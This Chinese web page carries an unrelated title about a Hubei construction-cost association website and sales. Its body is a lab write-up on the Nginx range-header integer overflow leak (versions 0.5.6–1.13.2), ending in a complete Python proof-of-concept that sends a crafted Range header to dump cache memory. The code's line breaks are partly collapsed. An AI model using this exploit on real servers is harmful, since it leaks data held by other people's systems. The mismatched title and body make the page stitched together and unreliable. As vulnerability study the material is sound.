当前位置：首页 > news >正文

湖北省建设工程造价管理协会网站销售怎么做

news 2025/7/10 5:30:45

湖北省建设工程造价管理协会网站,销售怎么做,如何创办.com网站,网站引导视频怎么做漏洞原理： 影响版本内默认配置模块的Nginx只需要开启缓存，攻击者可以通过发送包含恶意构造range域的header请求进行远程攻击造成信息泄露。影响范围： Nginx 0.5.6 – 1.13.2 漏洞复现： 开启靶场，访问8080端口中间…

漏洞原理：

影响版本内默认配置模块的Nginx只需要开启缓存，攻击者可以通过发送包含恶意构造range域的header请求进行远程攻击造成信息泄露。

影响范围：

Nginx 0.5.6 – 1.13.2

漏洞复现：

开启靶场，访问8080端口

中间件版本在影响范围内

使用poc验证漏洞：

#!/usr/bin/env python
import sys
import requestsif len(sys.argv) < 2:print("%s url" % (sys.argv[0]))print("eg: python %s http://your-ip:8080/" % (sys.argv[0]))sys.exit()headers = {'User-Agent': "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.10240"
}
offset = 605
url = sys.argv[1]
file_len = len(requests.get(url, headers=headers).content)
n = file_len + offset
headers['Range'] = "bytes=-%d,-%d" % (n, 0x8000000000000000 - n)r = requests.get(url, headers=headers)
print(r.text)